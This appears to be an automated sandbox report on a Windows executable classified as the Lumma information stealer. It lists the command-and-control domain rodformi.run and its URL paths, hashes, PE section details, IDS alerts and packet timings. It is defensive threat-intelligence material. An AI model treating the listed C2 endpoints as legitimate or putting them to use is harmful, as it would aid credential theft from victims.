                                                                https://duckduckgo.com/chrome_newtabv20random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYirandom.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrandom.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://rodformi.run:443/aUosozrandom.exe, 00000000.00000002.1151651944.0000000001744000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?random.exe, 00000000.00000003.1093278641.0000000005FC5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://rodformi.run/drandom.exe, 00000000.00000003.1150577015.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151808021.00000000017D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        		unknown
                                                                        https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&ctarandom.exe, 00000000.00000003.1103094774.00000000017E5000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1103039221.00000000017DF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://support.mozilla.org/products/firefoxgro.allrandom.exe, 00000000.00000003.1094204158.00000000060A2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://rodformi.run:443/aUosozcrandom.exe, 00000000.00000003.1124307891.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144094054.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1112992476.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150727353.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151651944.0000000001744000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            		unknown
                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://gemini.google.com/app?q=random.exe, 00000000.00000003.1066641344.0000000005FD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://rodformi.run/random.exe, random.exe, 00000000.00000003.1061957964.0000000001744000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1150577015.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1151808021.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://rodformi.run/cVrandom.exe, 00000000.00000003.1127961222.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1144142121.00000000017D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  172.67.197.67
                                                                                  		rodformi.runUnited States
                                                                                  		13335CLOUDFLARENETUSfalse

                                                                                  General Information

                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                  Analysis ID:1654467
                                                                                  Start date and time:2025-04-02 11:32:25 +02:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 3m 20s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:2
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:random.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@1/0@2/1
                                                                                  EGA Information:Failed
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  • Number of executed functions: 0
                                                                                  • Number of non-executed functions: 0
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Stop behavior analysis, all processes terminated
                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.95.31.18
                                                                                  • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                  • Execution Graph export aborted for target random.exe, PID 6208 because there are no executed function
                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  05:33:22API Interceptor7x Sleep call for process: random.exe modified

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  172.67.197.67install.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                                    OneProtect.exeGet hashmaliciousXmrigBrowse
                                                                                      wow_6262_build9.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        PositionLoader.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          https://rodformi.run/aUosozGet hashmaliciousUnknownBrowse
                                                                                            Setup.exeGet hashmaliciousLummaC StealerBrowse

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              rodformi.runL6qFGFpZpp.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.52.83
                                                                                              qWR3lUj.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.52.83
                                                                                              zzX3PUhPOA.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.52.83
                                                                                              install.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                                              • 172.67.197.67
                                                                                              OneProtect.exeGet hashmaliciousXmrigBrowse
                                                                                              • 172.67.197.67
                                                                                              https://rodformi.run/aUosozGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.52.83
                                                                                              wow_6262_build9.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.67.197.67
                                                                                              bprz1VA.exeGet hashmaliciousPython Stealer, Blank Grabber, LummaC StealerBrowse
                                                                                              • 104.21.52.83
                                                                                              random.exeGet hashmaliciousAmadey, LummaC Stealer, SheetRatBrowse
                                                                                              • 104.21.52.83
                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.52.83
                                                                                              bg.microsoft.map.fastly.netNVIDIA.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                                                                              • 199.232.214.172
                                                                                              3UQbvgGmir.exeGet hashmaliciousAsyncRATBrowse
                                                                                              • 199.232.210.172
                                                                                              qWR3lUj.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 199.232.210.172
                                                                                              index.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                                                                              • 199.232.214.172
                                                                                              a.ps1Get hashmaliciousPureCrypter, AsyncRATBrowse
                                                                                              • 199.232.210.172
                                                                                              NVIDIA.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                                                                              • 199.232.210.172
                                                                                              a.ps1Get hashmaliciousPureCrypter, AsyncRATBrowse
                                                                                              • 199.232.214.172
                                                                                              index.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                                                                              • 199.232.210.172
                                                                                              PO-GST-20250401.vbsGet hashmaliciousRemcosBrowse
                                                                                              • 199.232.210.172
                                                                                              Swift_Payment ___Receipt.vbsGet hashmaliciousUnknownBrowse
                                                                                              • 199.232.210.172
                                                                                              pki-goog.l.google.comNVIDIA.exeGet hashmaliciousPureCrypter, AsyncRATBrowse
                                                                                              • 142.251.35.163
                                                                                              a.ps1Get hashmaliciousPureCrypter, AsyncRATBrowse
                                                                                              • 142.250.81.227
                                                                                              PO-GST-20250401.vbsGet hashmaliciousRemcosBrowse
                                                                                              • 142.251.32.99
                                                                                              REQUEST FOR PRICE QUOTATION FOR THE REVISED ITEMS.exeGet hashmaliciousUnknownBrowse
                                                                                              • 142.250.65.227
                                                                                              cz4ZwB7N4G.exeGet hashmaliciousUnknownBrowse
                                                                                              • 142.250.80.99
                                                                                              https://maltese.com.br/share-sensitive-files-securely/Get hashmaliciousHTMLPhisherBrowse
                                                                                              • 142.250.80.35
                                                                                              uninstall.exeGet hashmaliciousUnknownBrowse
                                                                                              • 142.250.65.227
                                                                                              VUE-KMH-462E Missed Amex Entry-Mar-25 1.xlsmGet hashmaliciousUnknownBrowse
                                                                                              • 142.250.65.163
                                                                                              cRDJEdXHDo.dllGet hashmaliciousUnknownBrowse
                                                                                              • 142.251.40.131
                                                                                              install.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                                              • 142.250.81.227

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              CLOUDFLARENETUSPQPYAYJJ.exeGet hashmaliciousAmadeyBrowse
                                                                                              • 172.67.184.191
                                                                                              L6qFGFpZpp.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.52.83
                                                                                              qWR3lUj.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.52.83
                                                                                              zzX3PUhPOA.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.52.83
                                                                                              EdnFwO343A.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.16.1
                                                                                              https://maxenerwellness.com/Get hashmaliciousUnknownBrowse
                                                                                              • 104.17.24.14
                                                                                              yuioiuy.txt.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 104.21.78.10
                                                                                              https://maxenerwellness.com/Get hashmaliciousUnknownBrowse
                                                                                              • 104.17.24.14
                                                                                              cfr4.txt.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 172.67.202.129
                                                                                              xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                              • 162.158.203.51

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              a0e9f5d64349fb13191bc781f81f42e1L6qFGFpZpp.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.67.197.67
                                                                                              qWR3lUj.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.67.197.67
                                                                                              zzX3PUhPOA.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.67.197.67
                                                                                              EdnFwO343A.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.67.197.67
                                                                                              yuioiuy.txt.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 172.67.197.67
                                                                                              cfr4.txt.ps1Get hashmaliciousUnknownBrowse
                                                                                              • 172.67.197.67
                                                                                              random.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.67.197.67
                                                                                              5AzgNwCtN5.exeGet hashmaliciousCryptOne, LummaC StealerBrowse
                                                                                              • 172.67.197.67
                                                                                              7H9CCIVPzr.exeGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.197.67
                                                                                              pTe9lVT8R3.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.67.197.67

                                                                                              Dropped Files

                                                                                              No context

                                                                                              Created / dropped Files

                                                                                              No created / dropped files found

                                                                                              Static File Info

                                                                                              General

                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):7.950328239879898
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:random.exe
                                                                                              File size:1'872'896 bytes
                                                                                              MD5:7ddd1b8a415abf939fff535a63d55852
                                                                                              SHA1:002af611d08da05678b2ffa2e71f35301c686d39
                                                                                              SHA256:1afecee6b536d098ca5d3a7d594b200f7a2126349de4cad9ff0be2b78dba9e68
                                                                                              SHA512:7a6bd5307d1d6528723cb1ffb16ff717b0a852062db170fd288af110a0a676b83ec6a3c570c6b60697d184a8e51be72f12ff75de9182ce13da2d76883698be7b
                                                                                              SSDEEP:49152:TRgI+Xl4LXkqFZOsYW+7T1GzjcXotrIwslJv1xsE/DRtqIv7SQT:TSIGlGORHJ4W3lJv17z17S
                                                                                              TLSH:D285332238E76E5FCFF845345B02F284E6E9B7BD850262E953D4862D4C427F62182B37
                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....T.g..............................I...........@...........................I...........@.................................W...k..

                                                                                              File Icon

                                                                                              Icon Hash:90cececece8e8eb0

                                                                                              Static PE Info

                                                                                              General

                                                                                              Entrypoint:0x89a000
                                                                                              Entrypoint Section:.taggant
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x67E75486 [Sat Mar 29 02:01:42 2025 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:6
                                                                                              OS Version Minor:0
                                                                                              File Version Major:6
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:6
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                              Instruction
                                                                                              jmp 00007FA8D8D2276Ah
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x610570x6b.idata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x388.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x611f80x8.idata
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                              Sections

                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              0x10000x5f0000x2e000430e1cb1a11feba67e7ce3a59f4cca10False0.9984926970108695data7.97933591893857IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .rsrc0x600000x3880x400c4864e7dfce9ba19b9743f508300cefaFalse0.4560546875data5.478110944409358IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .idata 0x610000x10000x200f47b289bcee0e13a937cc29db13607bfFalse0.150390625data1.0437720338377494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              0x620000x29f0000x200e76affc0a80db1562509ea25dc64c05eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              zqekczog0x3010000x1980000x1974008dd6e5b4b948bb0b13280128fe10b999False0.994402600329957data7.95352697603957IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              annrbsan0x4990000x10000x600337a9e0390dd0c8f33d97f3590c0b593False0.5279947916666666data4.777826419687185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              .taggant0x49a0000x30000x2200d64721feefab81f9439f5b974a03436fFalse0.0642233455882353DOS executable (COM)0.7981725059123979IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                              RT_MANIFEST0x600580x330XML 1.0 document, ASCII text, with CRLF line terminators0.4987745098039216
                                                                                              DLLImport
                                                                                              kernel32.dlllstrcpy

                                                                                              Network Behavior

                                                                                              Download Network PCAP: filteredfull

                                                                                              Suricata IDS Alerts

                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                              2025-04-02T11:33:22.078124+02002061213ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rodformi .run)1192.168.2.10615531.1.1.153UDP
                                                                                              2025-04-02T11:33:22.423321+02002061214ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI1192.168.2.1049681172.67.197.67443TCP
                                                                                              2025-04-02T11:33:22.423321+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049681172.67.197.67443TCP
                                                                                              2025-04-02T11:33:24.103861+02002061214ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI1192.168.2.1049682172.67.197.67443TCP
                                                                                              2025-04-02T11:33:24.103861+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049682172.67.197.67443TCP
                                                                                              2025-04-02T11:33:25.611142+02002061214ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI1192.168.2.1049683172.67.197.67443TCP
                                                                                              2025-04-02T11:33:25.611142+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049683172.67.197.67443TCP
                                                                                              2025-04-02T11:33:26.746905+02002061214ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI1192.168.2.1049684172.67.197.67443TCP
                                                                                              2025-04-02T11:33:26.746905+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049684172.67.197.67443TCP
                                                                                              2025-04-02T11:33:28.649049+02002061214ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI1192.168.2.1049685172.67.197.67443TCP
                                                                                              2025-04-02T11:33:28.649049+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049685172.67.197.67443TCP
                                                                                              2025-04-02T11:33:29.859098+02002061214ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI1192.168.2.1049686172.67.197.67443TCP
                                                                                              2025-04-02T11:33:29.859098+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049686172.67.197.67443TCP
                                                                                              2025-04-02T11:33:31.717847+02002061214ET MALWARE Observed Win32/Lumma Stealer Related Domain (rodformi .run) in TLS SNI1192.168.2.1049687172.67.197.67443TCP
                                                                                              2025-04-02T11:33:31.717847+02002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1049687172.67.197.67443TCP

                                                                                              Network Port Distribution

                                                                                              • Total Packets: 101
                                                                                              • 443 (HTTPS)
                                                                                              • 53 (DNS)
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Apr 2, 2025 11:33:22.212400913 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:22.212455988 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:22.212542057 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:22.213774920 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:22.213788986 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:22.423160076 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:22.423321009 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:22.527708054 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:22.527746916 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:22.528104067 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:22.578366995 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:22.655366898 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:22.655412912 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:22.655563116 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.146486044 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.146545887 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.146574974 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.146594048 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.146627903 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.146666050 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.146676064 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.146713972 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.146744013 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.146755934 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.146764994 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.146797895 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.146806002 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.147221088 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.147255898 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.147263050 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.187752008 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.270107031 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.270277023 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.270349979 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.270361900 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.270390987 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.270534992 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.270534992 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.270564079 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.270632982 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.270704031 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.270821095 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.270859003 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.270874023 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.270989895 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.271028042 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.271037102 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.271790028 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.271830082 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.271837950 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.271924973 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.271960020 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.271960020 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.271971941 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.272006035 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.272013903 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.272629023 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.272672892 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.274116039 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.274132013 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.274146080 CEST49681443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.274152994 CEST44349681172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.898535967 CEST49682443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.898577929 CEST44349682172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:23.898654938 CEST49682443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.898984909 CEST49682443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:23.898993969 CEST44349682172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:24.103634119 CEST44349682172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:24.103861094 CEST49682443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:24.106494904 CEST49682443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:24.106515884 CEST44349682172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:24.106736898 CEST44349682172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:24.107976913 CEST49682443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:24.107976913 CEST49682443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:24.108016014 CEST44349682172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:24.108166933 CEST49682443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:24.148288012 CEST44349682172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:24.847443104 CEST44349682172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:24.847558975 CEST44349682172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:24.848372936 CEST49682443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:24.848372936 CEST49682443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:25.156538010 CEST49682443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:25.156578064 CEST44349682172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:25.396210909 CEST49683443192.168.2.10172.67.197.67
                                                                                              Apr 2, 2025 11:33:25.396269083 CEST44349683172.67.197.67192.168.2.10
                                                                                              Apr 2, 2025 11:33:25.396341085 CEST49683443192.168.2.10172.67.197.67
